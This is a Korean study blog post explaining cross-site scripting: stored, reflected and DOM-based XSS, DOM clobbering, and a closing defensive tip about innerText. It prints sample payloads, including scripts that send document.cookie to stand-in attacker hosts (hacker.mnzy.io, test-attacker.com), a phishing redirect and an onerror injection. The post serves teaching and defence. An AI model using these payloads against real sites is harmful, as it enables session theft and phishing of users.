[취약점] Client Side: Cross Site Scripting (XSS)

Study/WebHacking

[취약점] Client Side: Cross Site Scripting (XSS)

mnzy🌱 2024. 3. 15. 02:50

https://learn.dreamhack.io/173와 https://www.fis.kr/ko/major_biz/cyber_safety_oper/attack_info/security_news?articleSeq=3408 등 다양한 정보를 보고 정리한 내용입니다.

틀린 내용이 있다면 댓글로 알려주시면 감사하겠습니다.

XSS

클라이언트 사이드 취약점은 웹 페이지의 이용자를 대상으로 공격할 수 있는 취약점이다.

해당 종류의 취약점을 통해 이용자를 식별하기 위한 세션 및 쿠키 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있습니다.

XSS는 클라이언트 사이드 취약점 중 하나로, 공격자가 사용자의 웹 브라우저에 악성 스크립트 코드를 주입하고, 사용자가 악성 스크립트 코드를 실행함으로써, 사용자의 정보를 악의적으로 탈취하도록 공격할 수 있다.

종류
- 저장된 크로스 사이트 스크립팅 (Stored Cross-Site Scripting)
- 반사된 크로스 사이트 스크립팅 (Reflected Cross-Site Scripting)
- DOM 기반의 크로스 사이트 스크립팅 (DOM Based Cross-Site Scripting)

Stored XSS	XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
Reflected XSS	XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
DOM-based XSS	XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS (Fragment는 서버 요청/응답 에 포함되지 않는다.)

자바스크립트는 웹 문서의 동작을 정의한다. 이는 이용자가 버튼 클릭 시에 어떤 이벤트를 발생시킬지와 데이터 입력 시 해당 데이터를 전송하는 이벤트를 구현할 수 있다.

이러한 기능 외에도 이용자와의 상호 작용 없이 이용자의 권한으로 정보를 조회하거나 변경하는 등의 행위가 가능하다.

이러한 행위가 가능한 이유는 이용자를 식별하기 위한 세션 및 쿠키가 웹 브라우저에 저장되어 있기 때문이다. 따라서 공격자는 자바스크립트를 통해 이용자에게 보여지는 웹 페이지를 조작하거나, 웹 브라우저의 위치를 임의의 주소로 변경할 수 있다.

자바스크립트를 실행하기 위한 태그로는 <script>가 있다.

쿠키 및 세션 탈취 공격 코드

<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie; 
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.mnzy.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.mnzy.io/?cookie=" + document.cookie;
</script>

페이지 변조 공격 코드

<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked by mnzy !");
</script>

위치 이동 공격 코드

<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.mnzy.io/phishing"; 
// 새 창 열기
window.open("http://hacker.mnzy.io/")
</script>

1. Stored XSS

https://www.fis.kr/ko/major_biz/cyber_safety_oper/attack_info/security_news?articleSeq=3408

Stored XSS는 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS이다.

대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식이 있다.

게시물은 불특정 다수에게 보여지기 때문에 해당 기능에서 XSS 취약점이 존재할 경우 높은 파급력을 가진다.

예시로, 다음과 같은 시나리오가 존재할 수 있다.

Bob은 조작된 URL (자바 스크립트 코드를 포함하는)을 웹 애플리케이션 서버에 올린다.
Alice는 웹 애플리케이션 서버에 로그인을 한다.
Alice는 Bob이 올린 조작된 URL을 액세스 한다. (조작된 URL 접속 및 요청)
서버는 Bob의 자바 스크립트 코드를 포함하는 응답을 Alice에게 보낸다.
자바 스크립트 코드가 Alice의 브라우저상에서 실행된다.
Alice와 서버 사이에서 사용된 세션 토큰 정보가 Alice의 브라우저를 통해서 Bob에게 전달된다.
Bob은 Alice의 세션을 탈취한다.

2. Reflected XSS

Reflected XSS는 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생한다.

대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식이 있다.

이용자가 게시물을 검색하면 서버에서는 검색 결과를 이용자에게 반환한다.

일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생할 수 있다.

Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생한다.

따라서 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 한다. 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용한다.

예시로, 다음과 같은 시나리오가 존재할 수 있다.

Alice는 웹 애플리케이션 서버에 로그인한다. 다음의 세션 토큰을 포함하는 쿠키를 서버로부터 부여 받는다.
- Set-Cookie: sessID:=0jgpobmwil93jfn2930r8e
Bob은 다음과 같은 조작된 URL (자바 스크립트 코드를 포함하는)을 Alice에 보낸다.
- https://test.com/error.php?message=
Alice는 Bob의 조작된 URL을 서버에 요청한다.
서버는 Alice의 요청에 응답한다. 서버의 응답에는 Bob의 자바 스크립트가 포함된다.
Bob의 자바 스크립트 코드가 Alice의 웹 브라우저에서 실행된다.
- var i=new Image; i.src=“[<http://test-attacker.com/”+document.cookie>](<http://test-attacker.com/%E2%80%9D+document.cookie>);
Alice의 브라우저는 Bob이 운영하는 test-attacker.com에 요청을 보낸다. 이 요청에는 Alice와 서버사이에서 사용되는 세션 토큰이 포함된다.
- Host: [test-attacker.com](<http://test-attacker.com/>)
- GET /sessId= 0jgpobmwil93jfn2930r8e HTTP/1.1
Bob은 Alice의 세션을 탈취한다.

3. Dom based XSS

Dom

Document Object Model (DOM)은 브라우저가 HTML 문서를 관리하기 위해 사용하는 객체 모델이다.

웹 개발자는 DOM에 이벤트 핸들러를 추가하거나 DOM을 변경하는 방식으로 웹 페이지를 수정할 수 있다.

DOM은 자바스크립트에서 접근할 수 있도록 각종 API를 제공해 개발자에겐 굉장히 편리하지만, 이를 잘못 사용할 경우 개발자가 의도한 동작과 다르게 동작시킬 수 있는 취약점이 발생할 수 있다.

자바스크립트에서 DOM에 존재하는 Element의 내용을 수정하고, 새로운 Element를 생성하는 코드

document.getElementById 함수를 이용해 미리 정의되어 있던 name 이라는 id의 Element를 가져와 innerText를 변경해 실제 웹 문서의 내용을 변경할 수 있다.

또한, document.createElement 함수로 새로운 Element를 생성하는 것도 가능하며,

document.createTextNode 함수를 이용해 텍스트 노드를 생성하고, Element에 추가하여 웹 문서에 새로운 내용을 추가할 수 있다.

var elem = document.getElementById("name");
elem.innerText = "My name is mnzy";

var div_elem = document.createElement("div");

var text_node = document.createTextNode("Welcome to mnzy's tistory");
div_elem.appendChild(text_node);

Dom Clobbering

https://www.hahwul.com/cullinan/dom-clobbering/

DOM Clobbering은 Javascript에서의 DOM 처리 방식을 이용한 공격 기법이다. Clobbering은 의미 그대로 소프트웨어 공학에서 의도적,비의도적으로 특정 메모리나 레지스터를 완전히 덮어쓰는 현상을 의미한다.

다시 말하면 DOM을 덮어쓴다는 의미가 되는데, 즉 DOM Clobbering은 id, name 등 HTML에서 이용되는 식별자 속성을 이용해 자바스크립트에서 접근 가능한 DOM 객체들의 속성 및 메소드 등을 변조하는 기법이다.

기존 브라우저는 스크립트 작성자의 편의를 위해 DOM 노드 (element 등)에서 자식 노드에 직접 접근할 수 있도록 해왔다. 웹 프로그래밍을 공부하다 보면 document.getElementById() 를 사용하지 않고도 노드 id를 변수처럼 사용할 수 있음을 알게되는데, Window 전역 객체는 자바스크립트 Proxy와 유사한 형태로 구현되어 있어 정의되지 않은 속성은 DOM에서 찾게 된다.

예를 들어 DOM 내에 <a id="link1" href="https://host">host</a> element가 정의되어 있을 때, 자바스크립트에서 별도 변수 정의 없이 link1에 접근하면 해당 요소를 DOM에서 찾는다.

이는 웹 개발자 입장에서는 편리한 기능일 수 있으나, 만약 HTML 마크업이 사용자나 제삼자로부터 제공된다면 문제가 발생할 수 있다.

글로벌 변수 이름공간이나 요소 객체 속성은 미리 정의된 속성 / 함수 (e.g. element.innerHTML, window.open 등)와 충돌할 수 있으며, 프로그래머가 예상했던 것과 다른 값이 반환되게 된다.

예를 들어, 아래와 같이 location.href에 window.mylocation의 값을 넣는 코드가 있을 때 일반적으로 mylocation 값을 직접 제어하지 못한다면 location.href를 컨트롤할 수 없다.

document.location.href = window.mylocation

다만 HTML 코드를 삽입할 수 있는 환경이라면 (스크립트 계통은 차단이라고 하더라도) 아래와 같이 window.mylocation 값을 HTML 태그와 속성을 이용하여 만들 수 있다.

<input id="mylocation" value="javascript:alert(45)"></a>

Dom based XSS

XSS 취약점은 일반적으로 서버에서 이용자의 데이터를 제대로 검증하지 않거나, 필터링하지 않은 채 HTML 문서에 포함시켜 발생한다.

반면에 DOM-based XSS는 클라이언트, 즉 자바스크립트 단에서 이용자의 데이터를 가져와 사용하다가 XSS 취약점이 발생한다. 즉, 서버 단에서 올바르게 XSS를 필터링하여도 DOM-based XSS가 발생할 수 있다.

DOM-based XSS는 대표적으로 자바스크립트에서 URL의 파라미터나 해시를 가져와 innerHTML, outerHTML, insertAdjacentHTML과 같이 HTML에 마크업을 삽입할 수 있도록 해주는 기능에서 발생한다.

var name_el = document.getElementById("name"); //id 속성이 name인 HTML 요소를 찾기
name_el.innerHTML = `My name is ${decodeURIComponent(location.hash.slice(1))}.`;
//URL 해시값 디코딩 -> 문자열에 삽입

→ 자바스크립트에서 URL의 해시 값을 가져와 URL Decoding 후, 문서에 HTML 형태로 삽입한다면 URL 해시에 XSS 공격 코드를 넣어 임의 자바스크립트를 실행할 수 있다.

즉, 다음과 같이 공격 코드를 작성할 수 있다:

https://host/domxss.html#<img src=@ onerror=alert(1)>

이 때 innerHTML로 스크립트를 삽입할 때에는 <script> 태그를 이용한 자바스크립트 실행은 불가능하기 때문에 반드시 event 핸들러를 이용해 자바스크립트를 실행해야 한다.

//innerHTML 로 바로 스크립트 태그를 통한 자바스크립트 실행 X → onclick 등을 사용해야 함

예시로, 다음과 같은 시나리오가 존재할 수 있다.

Alice는 웹 애플리케이션 서버에 로그인을 한다.
Bob은 조작된 URL (자바 스크립트 코드를 포함하는)을 Alice에 보낸다.
Alice는 Bob의 조작된 URL을 서버에 요청한다.
서버는 Alice의 요청에 응답한다. 서버의 응답에는 Bob의 자바 스크립트가 포함되지 않는다.
Alice의 브라우저가 서버가 보내온 응답을 처리 할 때, Bob의 자바 스크립트가 실행된다.
Alice와 서버 사이에서 사용된 세션 토큰 정보가 Alice의 브라우저를 통해서 Bob에게 전달된다.
Bob은 Alice의 세션을 탈취한다.

DOM-based XSS를 방어하기 위해서는 이용자의 입력 값을 자바스크립트에서 동적으로 HTML에 추가하는 행위를 최대한 지양해야 한다. 또한, 만약 문서 내에 굳이 HTML로 삽입할 필요가 없다면 innerHTML 대신에 innerText를 사용해 추가해야 한다.